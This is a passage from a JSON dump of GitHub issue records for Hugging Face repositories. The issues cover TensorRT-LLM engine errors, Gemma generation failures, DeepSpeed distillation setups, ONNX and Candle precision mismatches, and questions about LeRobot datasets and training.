Chunking Scheduler Policy: None\n[TensorRT-LLM][INFO] Loaded engine size: 6981 MiB\n[TensorRT-LLM][ERROR] IRuntime::deserializeCudaEngine: Error Code 6: API Usage Error (The engine plan file is not compatible with this 
version of TensorRT, expecting library version 10.8.0.43 got\n..)\nError: Runtime(\"[TensorRT-LLM][ERROR] Assertion failed: Failed to deserialize cuda engine. (/usr/src/text-generation-inference/target/release/build/text-generation-backends-trtllm-479f10d4b58ebb37/out/build/_deps/trtllm-src/cpp/tensorrt_llm/runtime/tllmRuntime.cpp:239)\")\n```\n\n**Problem 2: Building Engine with trtllm-build**\nI attempted to build my engine directly using `trtllm-build`, but when launching TGI, I encounter this error:\n\n```\n2025-07-27T06:15:55.033318Z INFO text_generation_backends_trtllm: backends/trtllm/src/main.rs:293: Successfully retrieved tokenizer /models/llama-3.2-3b-instruct\n[2025-07-27 06:15:55.034] [info] [ffi.hpp:164] Initializing TGI - TensoRT-LLM Backend (v0.17.0.post1)\n[2025-07-27 06:15:55.101] [info] [ffi.hpp:173] [FFI] Detected 1 Nvidia GPU(s)\nterminate called after throwing an instance of 'nlohmann::json_abi_v3_11_3::detail::parse_error'\n what(): [json.exception.parse_error.101] parse error at line 1, column 1: attempting to parse an empty input; check that your input string or stream contains the expected JSON\n```\n\nThe error suggests it cannot find a JSON file, but the `config.json` file is present in the engine directory:\n\n```bash\nroot@5ddf177112d7:/usr/local/tgi/bin# ls -l /engines/llama-3.2-3b-instruct/\ntotal 3033324\n-rw-r--r-- 1 root root 7848 Jul 26 17:21 config.json\n-rw-r--r-- 1 root root 3106108276 Jul 26 17:21 rank0.engine\n```\n\n**Environment:**\n- Model: llama-3.2-3b-instruct\n- TGI Version: 3.3.4-trtllm\n- TensorRT-LLM Version: v0.17.0.post1\n\nCould you please help resolve these compatibility issues or provide guidance on the correct workflow for using TensorRT-LLM with TGI?\n\n### Information\n\n- [x] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [x] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n**1/ Build your engine :** \n`docker run --rm -it --gpus=1 --shm-size=1g -v \"/home/jyce/unmute.mcp/volumes/llm-tgi/engines:/engines\" -v \"/home/jyce/unmute.mcp/volumes/llm-tgi/models:/models\" huggingface/optimum-nvidia:v0.1.0b8-py310 bash\n`\n```\n optimum-cli export trtllm \\\n --tp=1 \\\n --pp=1 \\\n --max-batch-size", "url": "https://github.com/huggingface/text-generation-inference/issues/3304", "state": "open", "labels": [], "created_at": "2025-07-27T06:24:29Z", "updated_at": "2025-10-06T09:56:29Z", "comments": 4, "user": "psykokwak-com" }, { "repo": "huggingface/transformers", "number": 39705, "title": "[i18n-] Translating docs to ", "body": "\n\nHi!\n\nLet's bring the documentation to all the Bengali-speaking community \ud83c\udf10 (currently 0 out of 267 complete)\n\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/transformers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. 
Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\n\nSome notes:\n\n* Please translate using an informal tone (imagine you are talking with a friend about transformers \ud83e\udd17).\n* Please translate in a gender-neutral way.\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/transformers/tree/main/docs/source).\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/transformers/blob/main/docs/source/en/_toctree.yml).\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. Please ping @stevhliu for review.\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/).\n\n## Get Started section\n\n- [x] [index.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/index.md) https://github.com/huggingface/transformers/pull/20180\n- [ ] [quicktour.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/quicktour.md) (waiting for initial PR to go through)\n- [ ] [installation.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/installation.md).\n\n## Tutorial section\n- [ ] [pipeline_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/pipeline_tutorial.md)\n- [ ] [autoclass_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/autoclass_tutorial.md)\n- [ ] [preprocessing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/preprocessing.md)\n- [ ] [training.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/training.md)\n- [ ] [accelerate.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/accelerate.md)\n- [ ] [model_sharing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/model_sharing.md)\n- [ ] [multilingual.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/multilingual.md)\n\n\n", "url": "https://github.com/huggingface/transformers/issues/39705", "state": "open", "labels": [ "WIP" ], "created_at": "2025-07-27T06:18:20Z", "updated_at": "2025-07-27T11:58:32Z", "comments": 1, "user": "ankitdutta428" }, { "repo": "huggingface/transformers", "number": 39699, "title": "No flag to support Conditional Parameter Loading for gemma-3n-E2B models in transformer", "body": "### System Info\n\nHi,\nWhile a lot has been mentioned about gemma-3n-E2B and gemma-3n-E4B about the COnditional parameter loading and reduced memory loading\nThere is no configuration currently visible in transformers for supporting that.\nIs it possible to get the related configuration/code/documentation to make it work to get an actual lower memory model?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nimport torch\nfrom transformers import AutoProcessor, AutoModelForImageTextToText\n\nGEMMA_MODEL_ID = \"google/gemma-3n-E2B-it\"\n\nprint(\"Loading processor\")\nprocessor = AutoProcessor.from_pretrained(GEMMA_MODEL_ID)\n\nprint(\"Loadind model\")\nmodel = 
AutoModelForImageTextToText.from_pretrained(\n GEMMA_MODEL_ID, torch_dtype=\"auto\", device_map=None).to(\"cpu\")\n\nThere is no flag for doing Conditional parameter Loading or PLE\n\n### Expected behavior\n\nSome flag using which Conditional Parameter Loading can be enabled and save on the memory", "url": "https://github.com/huggingface/transformers/issues/39699", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-26T18:08:00Z", "updated_at": "2025-09-03T08:02:58Z", "comments": 2, "user": "aakashgaur01" }, { "repo": "huggingface/tokenizers", "number": 1835, "title": "Can you provide binary releases?", "body": "It seems that binaries are not available in recent versions. \ntokenizers module is essential for the latest models, and it would be preferable if it could be easily installed. \nSetting up a Rust compilation environment can be cumbersome, and it's almost impossible to do so offline. \nCould we possibly distribute something in binary form via PyPI or here?", "url": "https://github.com/huggingface/tokenizers/issues/1835", "state": "closed", "labels": [], "created_at": "2025-07-26T16:07:12Z", "updated_at": "2025-09-08T13:49:52Z", "comments": 4, "user": "goldenmomonga" }, { "repo": "huggingface/lerobot", "number": 1599, "title": "Evaluation results of VLA models on MetaWorld Benchmark", "body": "Thank you for this excellent work! I noticed that the paper mentions evaluation results of VLA models on MetaWorld. However, in the original papers for Octo and \u03c0\u2080, results are only reported on the LIBERO benchmark, and I haven\u2019t found their MetaWorld evaluations in other related studies. I\u2019d like to know how Octo and \u03c0\u2080 were specifically evaluated on MetaWorld in this work, including implementation details (e.g., for \u03c0\u2080, was it full finetune or only fine-tuning the action expert?). Additionally, the MetaWorld MT50 dataset on LeRobot appears to lack data for one task\u2014is this the real data used for fine-tuning VLAs?", "url": "https://github.com/huggingface/lerobot/issues/1599", "state": "open", "labels": [ "enhancement", "question", "policies", "simulation" ], "created_at": "2025-07-26T11:18:54Z", "updated_at": "2025-08-12T09:17:44Z", "user": "Zooy138" }, { "repo": "huggingface/transformers", "number": 39686, "title": "CRITICAL ISSUE REPORT! 
GEMMA 3 1B CANNOT RUN!", "body": "How to reproduce:\n\nRun this:\n\n```\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\n# Load the base model in FP16\nbase_model = AutoModelForCausalLM.from_pretrained(\n \"unsloth/gemma-3-1b-pt\",\n low_cpu_mem_usage=True,\n return_dict=True,\n torch_dtype=torch.float16,\n device_map=\"mps\",\n)\n\n# Load and configure the tokenizer\ntokenizer = AutoTokenizer.from_pretrained(\"unsloth/gemma-3-1b-pt\", trust_remote_code=True)\n\n# Generate the text\nprompt = \"Once upon a time\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").to(base_model.device)\noutputs = base_model.generate(inputs.input_ids, max_length=50)\n# Decode the generated text\ngenerated_text = tokenizer.decode(outputs[0], skip_special_tokens=True)\nprint(generated_text)\n```\n\nError:\n\n```\n(yuna) yuki@yuki AI % python gener.py\n k_out_updated = k_out_shifted.index_copy(2, update_position, key_states)\nTraceback (most recent call last):\n File \"/Users/yuki/Documents/AI/gener.py\", line 19, in \n outputs = base_model.generate(inputs.input_ids, max_length=50)\n File \"/opt/anaconda3/envs/yuna/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/opt/anaconda3/envs/yuna/lib/python3.10/site-packages/transformers/generation/utils.py\", line 2623, in generate\n result = self._sample(\n File \"/opt/anaconda3/envs/yuna/lib/python3.10/site-packages/transformers/generation/utils.py\", line 3649, in _sample\n next_tokens = torch.multinomial(probs, num_samples=1).squeeze(1)\nRuntimeError: probability tensor contains either `inf`, `nan` or element < 0\n```\n\nSystem: macOS Tahoe, MacBook Pro M1 with 16 GB of RAM", "url": "https://github.com/huggingface/transformers/issues/39686", "state": "closed", "labels": [], "created_at": "2025-07-26T00:22:27Z", "updated_at": "2025-07-28T12:07:50Z", "comments": 5, "user": "yukiarimo" }, { "repo": "huggingface/lerobot", "number": 1592, "title": "Time spent on imitation learning training (ACT)", "body": "I use colab to make a policy with ACT model.\nThe note said, \"Training with the ACT policy for 100,000 steps typically takes about 1.5 hours on an NVIDIA A100 GPU,\", and I used A100 model in colab too.\nHowever the expected time is 13 hours, which seems to be much longer than the standard value of 1.5 hours. \nIs it correct that it takes this much time in a colab environment? \nI used dataset from \nhttps://huggingface.co/datasets/initie/test_pick \nand there is no problem with the operation of the training code.", "url": "https://github.com/huggingface/lerobot/issues/1592", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-25T06:36:35Z", "updated_at": "2025-10-08T08:32:32Z", "user": "initia1013" }, { "repo": "huggingface/datasets", "number": 7699, "title": "Broken link in documentation for \"Create a video dataset\"", "body": "The link to \"the [WebDataset documentation](https://webdataset.github.io/webdataset).\" is broken. 
\nhttps://huggingface.co/docs/datasets/main/en/video_dataset#webdataset \n\n\"Image\"", "url": "https://github.com/huggingface/datasets/issues/7699", "state": "open", "labels": [], "created_at": "2025-07-24T19:46:28Z", "updated_at": "2025-07-25T15:27:47Z", "comments": 1, "user": "cleong110" }, { "repo": "huggingface/transformers", "number": 39637, "title": "[BUG] Run 111B+ Teacher distributed inference and 8B Student distributed training on multi-node H200 GPUs using the Transformers Trainer without encountering OOM errors?", "body": "Hello, first off, apologies if this information is already available elsewhere. I've searched through the documentation and existing issues but haven't found a clear answer to my question.\n\nI have access to 2 to 4 nodes (16 to 32 GPUs in total), each equipped with 8x140GB H200 GPUs. My objective is to perform large-scale distributed inference using a massive 111B-parameter Teacher model (CohereLabs/c4ai-command-a-03-2025) and simultaneously conduct online knowledge distillation (soft-logit based) from this 111B Teacher model to a smaller 8B Student model (CohereLabs/c4ai-command-r7b-12-2024).\n\nIs there a way to simultaneously run distributed inference for Teacher models larger than 111B and distributed training for Student models in a multi-node setup, utilizing Hugging Face Transformers' Trainer?\n\nThe Transformers version I'm using is v4.51.3. I've observed the use of model = deepspeed.tp_model_init within the def deepspeed_init function in src/transformers/integrations/deepspeed.py. I attempted to apply this code, but it resulted in a torch.distributed.DistBackendError.\n\nI would be very grateful if someone could explain what would be most suitable for my use case. A minimal working example would be the icing on the cake. 
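\n\nFor reference, the soft-logit distillation loss at the heart of this setup is small enough to sanity-check in isolation; a minimal sketch (shapes and temperature are illustrative, not taken from the script below):\n\n```python\nimport torch\nimport torch.nn.functional as F\n\ndef soft_logit_kd_loss(student_logits, teacher_logits, temperature=1.0):\n    # Classic KD: KL(teacher || student) on temperature-softened distributions,\n    # scaled by T^2 so gradient magnitudes stay comparable across temperatures.\n    s = F.log_softmax(student_logits / temperature, dim=-1)\n    t = F.softmax(teacher_logits / temperature, dim=-1)\n    return F.kl_div(s, t, reduction=\"batchmean\") * temperature**2\n\n# Toy shapes: (batch, seq_len, vocab)\nstudent_logits = torch.randn(1, 8, 32000, requires_grad=True)\nwith torch.no_grad():  # the teacher is inference-only\n    teacher_logits = torch.randn(1, 8, 32000)\nloss = soft_logit_kd_loss(student_logits, teacher_logits)\nloss.backward()\n```\n\n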
Surely, if the Open LLM Leaderboard shows that online knowledge distillation (soft-logit) is possible with large models exceeding 111B, there must be a straightforward way to achieve what I want, but I'm unsure how everyone else does it.\n\nFor reference, below is the script I'm currently working with:\n\n`deepspeed --num_nodes 2 --num_gpus 8 \\\n --hostfile $HOSTFILE \\\n --master_addr $MASTER_ADDR \\\n --master_port=62535 \\\n train.py \\\n --teacher CohereLabs/c4ai-command-a-03-2025 \\\n --student CohereLabs/c4ai-command-r7b-12-2024 \\\n --epochs 1 --batch_size 1 --seq_len 4096 --temperature 1.0 --max_samples 150 --lr 1e-6 2>&1 | tee -a \"./train.log\" `\n\n```import deepspeed\nimport torch.distributed as dist\nimport os, math, argparse, warnings, torch, random, multiprocessing as mp\nfrom datasets import load_dataset, concatenate_datasets\nfrom transformers import (AutoTokenizer, AutoModelForCausalLM,\n PreTrainedTokenizerBase)\nfrom torch.nn.utils.rnn import pad_sequence\nimport torch.nn.functional as F\nfrom datetime import timedelta\nfrom deepspeed.runtime.utils import see_memory_usage\n\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\nos.environ.setdefault(\"NCCL_ASYNC_ERROR_HANDLING\", \"1\")\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\nmp.set_start_method(\"spawn\", force=True)\n\ndef get_args():\n p = argparse.ArgumentParser()\n p.add_argument(\"--teacher\", default=\"\")\n p.add_argument(\"--student\", default=\"\")\n p.add_argument(\"--dataset\", default=\"\")\n p.add_argument(\"--split\", default=\"train\")\n p.add_argument(\"--epochs\", type=int, default=1)\n p.add_argument(\"--batch_size\", type=int, default=1,\n help=\"per-GPU micro-batch\")\n p.add_argument(\"--seq_len\", type=int, default=4096)\n p.add_argument(\"--temperature\", type=float, default=1.0)\n p.add_argument(\"--lr\", type=float, default=1e-6)\n p.add_argument(\"--max_samples\", type=int, default=0,\n help=\"0=1000 \")\n p.add_argument(\"--local_rank\", type=int, default=-1,\n help=\"deepspeed/torch launcher GPU index\")\n p.add_argument(\"--cache_path\", default=\"\")\n p.add_argument(\"--hf_token\", default=\"\")\n p = deepspeed.add_config_arguments(p)\n return p.parse_args()\n\n\ndef main():\n timeout_seconds = 3600 \n timeout_duration = timedelta(seconds=timeout_seconds)\n dist.init_process_group(\n backend=\"nccl\",\n timeout=timeout_duration \n )\n args = get_args()\n deepspeed.init_distributed()\n rank, world = deepspeed.comm.get_rank(), deepspeed.comm.get_world_size()\n device = torch.device(\"cuda\", deepspeed.comm.get_local_rank())\n # Tokenizer \n tokenizer = AutoTokenizer.from_pretrained(args.student,\n use_fast=True, trust_remote_code=True)\n if tokenizer.pad_token is None:\n tokenizer.pad_token = tokenizer.eos_token\n \n # tokenizer token_id \n tokenizer.eos_token_id = tokenizer.convert_tokens_to_ids(tokenizer.eos_token)\n tokenizer.pad_token_id = tokenizer.convert_tokens_to_ids(tokenizer.pad_token)\n \n \n # Teacher (inference only) \n teacher_model = AutoModelForCausalLM.from_pretrained(\n args.teacher, torch_dtype=torch.bfloat16,\n low_cpu_mem_usage=True,\n trust_remote_code=True, device_map=None, \n cache_dir=args.cache_path,token=args.hf_token) \n \n see_memory_usage(\"After load model\", force=True)\n \n teacher_model.config.eos_token_id = tokenizer.eos_token_id\n teacher_model.config.pad_token_id = tokenizer.pad_token_id\n \n teacher_engine = deepspeed.init_inference(\n teacher_model,\n mp_size=world,\n dtype=torch.bfloat16,\n replace_with_kernel_inject=True, \n 
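# replace_with_kernel_inject swaps supported submodules for fused inference kernels;\n # with mp_size=world the teacher is tensor-parallel sharded across all ranks,\n # which is what lets the 111B model fit in GPU memory.\n 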
replace_method=\"auto\")\n ", "url": "https://github.com/huggingface/transformers/issues/39637", "state": "closed", "labels": [], "created_at": "2025-07-24T15:05:38Z", "updated_at": "2025-09-01T08:03:18Z", "comments": 3, "user": "seona21" }, { "repo": "huggingface/lerobot", "number": 1586, "title": "Real-world deploy on ALOHA Robot", "body": "How could I deploy the policies on the ALOHA robot? And how could I deploy in the real world? ", "url": "https://github.com/huggingface/lerobot/issues/1586", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-07-24T12:52:06Z", "updated_at": "2025-08-21T16:18:26Z", "user": "LogSSim" }, { "repo": "huggingface/diffusers", "number": 11984, "title": "A compatibility issue when using custom Stable Diffusion with pre-trained ControlNets", "body": "I have successfully fine-tuned a Stable Diffusion v1.5 model using the Dreambooth script, and the results are excellent. However, I've encountered a compatibility issue when using this custom model with pre-trained ControlNets. Since the Dreambooth process modifies the U-Net weights, the original ControlNet is no longer aligned with the fine-tuned model, leading to a significant degradation in control and image quality.\n\nMy goal is to find a way to make them compatible again. It's important to clarify that I am trying to avoid a full, separate fine-tuning of the ControlNet on my custom model. That process is data- and resource-intensive, which defeats the purpose of a lightweight personalization method like Dreambooth. I have tried modifying the train_dreambooth.py script to incorporate ControlNet, but results have been consistently poor.\n\nIs there a dedicated script or a recommended workflow in diffusers to fine-tune a Stable Diffusion with ControlNet via Dreambooth? Any guidance or pointers would be greatly appreciated. Thanks a lot!", "url": "https://github.com/huggingface/diffusers/issues/11984", "state": "closed", "labels": [], "created_at": "2025-07-24T09:16:55Z", "updated_at": "2025-07-24T15:15:20Z", "comments": 6, "user": "ScienceLi1125" }, { "repo": "huggingface/lighteval", "number": 868, "title": "How to calculate perplexity from an OpenAI compatible API", "body": "Hello,\n\nI'm new to LightEval. I want to use LightEval to evaluate an LLM model that is served via an API. The API is OpenAI compatible. It also returns logprobs for each token. Is there a built-in function to evaluate the perplexity score? I'm asking because I see that it\u2019s not implemented.\n\nhttps://github.com/huggingface/lighteval/blob/d805f9fa0a84da9ca4c0c6a638bbed149a7012a3/src/lighteval/models/litellm_model.py#L322\n\nAny help or guidance is greatly appreciated. Thanks.", "url": "https://github.com/huggingface/lighteval/issues/868", "state": "open", "labels": [], "created_at": "2025-07-24T07:27:05Z", "updated_at": "2025-07-24T07:27:05Z", "user": "mrtpk" }, { "repo": "huggingface/lerobot", "number": 1580, "title": "Environment_State in act and SmolVLA policy", "body": "Hi, Thanks for the awesome work!\nI have been noticing a variable called observation.environment_state in the act policy. What is exactly the feature environment_state. 
Thanks!", "url": "https://github.com/huggingface/lerobot/issues/1580", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-24T03:32:31Z", "updated_at": "2025-10-08T13:09:33Z", "user": "kasiv008" }, { "repo": "huggingface/transformers.js", "number": 1379, "title": "Why Do I Get Different Outputs in Python and JavaScript for the Same ONNX Model?", "body": "Hi ,\n\nI'm running inference on the same ONNX model (t5-small-new) using both Python and JavaScript (via ONNX Runtime). However, I'm noticing that the outputs are different between the two environments, even though the inputs and model are the same. The output of the Python code is correct while JS is not accurate.\n\nPython Code:\n```\nfrom optimum.onnxruntime import ORTModelForSeq2SeqLM\nfrom transformers import AutoTokenizer\n\nmodel = ORTModelForSeq2SeqLM.from_pretrained(\n \"t5-small-new\",\n use_cache=True \n)\n\ntokenizer = AutoTokenizer.from_pretrained(\"t5-small-new\")\n\ninputs = tokenizer(\"My Input\", return_tensors=\"pt\")\noutputs = model.generate(**inputs)\n\nprint(\"Prediction:\", tokenizer.decode(outputs[0], skip_special_tokens=True))\n```\n\n\nJS code:\n```\nconst inputText = \"My Input\";\n\nconst tokenizer = await window.AutoTokenizer.from_pretrained(\"t5-small-new\");\nconst model = await window.AutoModelForSeq2SeqLM.from_pretrained(\"t5-small-new\", {\n dtype: \"fp32\",\n device: \"wasm\",\n});\n\nconst encoded = await tokenizer(inputText, {\n return_tensors: \"pt\",\n});\n\nconst output = await model.generate({\n input_ids: encoded.input_ids,\n attention_mask: encoded.attention_mask,\n use_cache: true,\n});\n\nconst decoded = await tokenizer.decode(output[0], {\n skip_special_tokens: true,\n});\n\nconsole.log(\"JS Prediction:\", decoded);\n\n```\n\n\nMy model uses `decoder_model_merged.onnx`, `encoder_model.onnx`, and `decoder_model.onnx`. \n\nCould you guide me on what is happening and why I get different results?", "url": "https://github.com/huggingface/transformers.js/issues/1379", "state": "closed", "labels": [ "question" ], "created_at": "2025-07-23T20:13:57Z", "updated_at": "2025-08-29T23:43:21Z", "user": "mahdin75" }, { "repo": "huggingface/transformers", "number": 39618, "title": "SageAttention for attention implementation?", "body": "### Feature request\n\nI've noticed it's been a while now, but transformers still only has flash attention as the fastest attention backend for calls like these: \n\n\"Image\"\n\nAre there any plans to add sageattention as well? 
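\n\nIn the meantime, the pluggable attention registry in recent releases might reduce this to a single registration instead of per-model patches; a rough sketch, assuming sageattention's `sageattn` kernel and the `AttentionInterface` registry (both worth verifying against the installed versions):\n\n```python\nimport torch\nfrom transformers import AttentionInterface, AutoModelForCausalLM\nfrom sageattention import sageattn  # assumes sageattention is installed\n\ndef sage_attention_forward(module, query, key, value, attention_mask, **kwargs):\n    # query/key/value arrive as (batch, num_heads, seq_len, head_dim), i.e. \"HND\";\n    # GQA models may need their key/value heads repeated before this call.\n    out = sageattn(query, key, value, tensor_layout=\"HND\",\n                   is_causal=getattr(module, \"is_causal\", True))\n    # transformers expects (batch, seq_len, num_heads, head_dim) back\n    return out.transpose(1, 2).contiguous(), None\n\nAttentionInterface.register(\"sage\", sage_attention_forward)\n\nmodel = AutoModelForCausalLM.from_pretrained(\n    \"meta-llama/Llama-3.2-1B\", attn_implementation=\"sage\",\n    torch_dtype=torch.float16, device_map=\"cuda\")\n```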
\n\n### Motivation\n\nIt's become increasingly involved to have to monkey patch sage attention support for every new model that comes out, and for older models that used older versions of transformers, I've had to do unholy things like this:\n\n\"Image\"\n\n\n### Your contribution\n\nI have an example of a patch I had to do so I will upload that here\n\n[llama_nar.py.txt](https://github.com/user-attachments/files/21393926/llama_nar.py.txt)", "url": "https://github.com/huggingface/transformers/issues/39618", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-07-23T19:10:47Z", "updated_at": "2025-07-25T12:30:37Z", "comments": 4, "user": "Many0therFunctions" }, { "repo": "huggingface/diffusers", "number": 11977, "title": "how to load a finetuned model especially during validation phase", "body": "\"Image\"\nAs the above, I have finetuned the model and want to validate it, but the given demo which is train_dreambooth_sd3.py still uses \n\"pipeline = StableDiffusion3Pipeline.from_pretrained(\n args.pretrained_model_name_or_path,\n transformer=transformer,\n text_encoder=text_encoder_one,\n text_encoder_2=text_encoder_two,\n text_encoder_3=text_encoder_three,\n ) \" .\n\nI wonder why it still load from args.pretrained_model_name_or_path as it has saved the finetuned model in the save_path which is \"os.path.join(args.output_dir, f\"checkpoint-{global_step}\")\".\n\nso, how to how to load the finetuned model during validation phase?\n\nAnother confusion, what is the difference between \" StableDiffusion3Pipeline.from_pretrained() \" and \"SD3Transformer2DModel.from_pretrained\" as the following:\n\n\"Image\"\n\n ", "url": "https://github.com/huggingface/diffusers/issues/11977", "state": "open", "labels": [], "created_at": "2025-07-23T11:54:16Z", "updated_at": "2025-07-24T09:19:11Z", "user": "micklexqg" }, { "repo": "huggingface/lerobot", "number": 1579, "title": "Is there a video backend supporting nondestructive encoding?", "body": "I saved images during recording through not deletng folder `images`. When I try to compare the first frame.png in `images` folder and dataset=make_dataset(config)'s first image, I found the saved png file is nondestructive. But the image I got by lerobot is not.\n\nHow I find:\nin `def save_episode` \n```\n # img_dir = self.root / \"images\"\n # if img_dir.is_dir():\n # shutil.rmtree(self.root / \"images\")\n```\nThis has been moved in latest version. now:\n\n```\n def encode_episode_videos(self, episode_index: int) -> None:\n ...\n encode_video_frames(img_dir, video_path, self.fps, overwrite=True)\n shutil.rmtree(img_dir)\n```\n\nI saved some images through recording with one channel filled with zero. 
Then I read the saved png through cv2, and it showed the 0-filled channel.\n\nThen I tried to check whether I could get the same image through lerobot,\nso I did this in train.py:\n```\nraw_dataloader = torch.utils.data.DataLoader(\n dataset,\n num_workers=cfg.num_workers,\n batch_size=cfg.batch_size,\n shuffle=False,\n sampler=sampler,\n pin_memory=device.type == \"cuda\",\n drop_last=False,\n )\nimage_tensor=peek_batch[\"observation.images.side_depth\"][0]\nimage_np = (image_tensor * 255).permute(1, 2, 0).cpu().numpy().astype(np.uint8)\n```\nSadly, `image_np` is quite different from the real png: it doesn't have a 0-filled channel, and its average value is larger.\n", "url": "https://github.com/huggingface/lerobot/issues/1579", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-23T08:38:39Z", "updated_at": "2025-08-12T09:22:26Z", "user": "milong26" }, { "repo": "huggingface/candle", "number": 3032, "title": "`matmul` (and others) Precision issues between Candle & PyTorch", "body": "We noticed there's some precision discrepancy in matrix multiplication and the linear layer between Candle and PyTorch. This matters a lot when reproducing LLMs that originated in PyTorch in Candle. We used the `hf_hub::api::Api` to get the safetensors from the hub and tested the precision issues for each module independently. This also occurs for the `BF16` dtype in `Cuda`.\n\nHere's a shortened list of tests (for brevity) between `candle_core::tensor::Tensor::matmul` and `torch.matmul`:\n```\n\u274c test_0: MSE=0.0000000004096404, MAE=0.00001550 (dims: 2048x256, dtype: F32, device: Cpu)\n\u274c test_1: MSE=0.0000000003628351, MAE=0.00001453 (dims: 2048x256, dtype: F32, device: Cpu)\n...\n\u274c test_48: MSE=0.0000000000824194, MAE=0.00000633 (dims: 512x1024, dtype: F32, device: Cpu)\n\u274c test_49: MSE=0.0000000003840639, MAE=0.00001534 (dims: 2048x256, dtype: F32, device: Cpu)\n```\n\nWe did notice `candle_nn::Embedding` performed at 0-tolerance (tested indirectly), which probably means the loaded weights themselves are exact.\n\nHave you tried validating your implementation against PyTorch at 0-tolerance (within the same CPU/GPU architecture)? Is there any proper way to mitigate this? We need it for our implementation. Thank you.", "url": "https://github.com/huggingface/candle/issues/3032", "state": "closed", "labels": [], "created_at": "2025-07-23T04:07:08Z", "updated_at": "2025-09-27T21:25:51Z", "comments": 4, "user": "andrew-shc" }, { "repo": "huggingface/lerobot", "number": 1578, "title": "Lerobot metaworld dataset only provides 49 tasks", "body": "https://huggingface.co/datasets/lerobot/metaworld_mt50\n\nThere are only 49 tasks, and the \"Push the puck to a goal\" task repeats twice", "url": "https://github.com/huggingface/lerobot/issues/1578", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-07-23T04:03:17Z", "updated_at": "2025-08-12T09:23:12Z", "user": "chenkang455" }, { "repo": "huggingface/lerobot", "number": 1577, "title": "test failed after training SVLA", "body": "I collected 76 sets of data and used the same calibration file as during collection. However, after training for 24k steps, the model obtained was unable to complete the grasping task during inference. 
Can anyone help me deal with the problem?\n[dataset](https://huggingface.co/datasets/Xiaoyan97/orange_block_pickplace)\n", "url": "https://github.com/huggingface/lerobot/issues/1577", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-23T03:59:26Z", "updated_at": "2025-08-12T09:23:26Z", "user": "Liu-Xiaoyan97" }, { "repo": "huggingface/lerobot", "number": 1576, "title": "Multiple Dataset training", "body": "How to train multiple lerobot dataset? is there any function I can use it", "url": "https://github.com/huggingface/lerobot/issues/1576", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-23T03:46:03Z", "updated_at": "2025-10-10T09:30:06Z", "user": "JustinKai0527" }, { "repo": "huggingface/transformers", "number": 39596, "title": "Does transformers support python3.13 -- disable-gil or python3.14 free threading?", "body": "Does transformers support python3.13 -- disable-gil or python3.14 free threading?\nI got an error when trying to install transformers on these two python versions.", "url": "https://github.com/huggingface/transformers/issues/39596", "state": "closed", "labels": [], "created_at": "2025-07-23T02:34:03Z", "updated_at": "2025-08-30T08:02:54Z", "comments": 2, "user": "SoulH-qqq" }, { "repo": "huggingface/transformers.js", "number": 1374, "title": "nanoVLM support", "body": "### Question\n\nI would like to know if there is any plan to support models built with nanoVLM [https://github.com/huggingface/nanoVLM], thanks.", "url": "https://github.com/huggingface/transformers.js/issues/1374", "state": "open", "labels": [ "question" ], "created_at": "2025-07-22T11:43:57Z", "updated_at": "2025-07-23T09:02:15Z", "user": "sbrzz" }, { "repo": "huggingface/diffusers", "number": 11971, "title": "What is the minimum memory requirement for model training?", "body": "Hello, I would like to try training an SDXL model using my own dataset. What is the minimum memory size required for the model?", "url": "https://github.com/huggingface/diffusers/issues/11971", "state": "closed", "labels": [], "created_at": "2025-07-22T07:52:28Z", "updated_at": "2025-07-22T08:26:27Z", "user": "WWWPPPGGG" }, { "repo": "huggingface/transformers", "number": 39565, "title": "Model forward execution in full eager mode?", "body": "I know there is a flag `attn_implementation` which could trigger specialized attention kernel implementation. Besides this, does everything run in native PyTorch eager mode? Does `transformers` have any other custom op or kernel?\n```python\nmodel = AutoModelForCausalLM.from_pretrained(\"meta-llama/Llama-3.1-8B\", device_map=\"auto\", torch_dtype=torch.bfloat16, attn_implementation=None)\nmodel.forward(input_tokens)\n```\n\nI'm asking this to see if `transformers` can be used as a numerical baseline to verify other inference backend", "url": "https://github.com/huggingface/transformers/issues/39565", "state": "closed", "labels": [], "created_at": "2025-07-21T21:49:05Z", "updated_at": "2025-08-21T08:34:59Z", "comments": 3, "user": "22quinn" }, { "repo": "huggingface/lerobot", "number": 1564, "title": "How are Episode Stats used?", "body": "I'm looking to create a 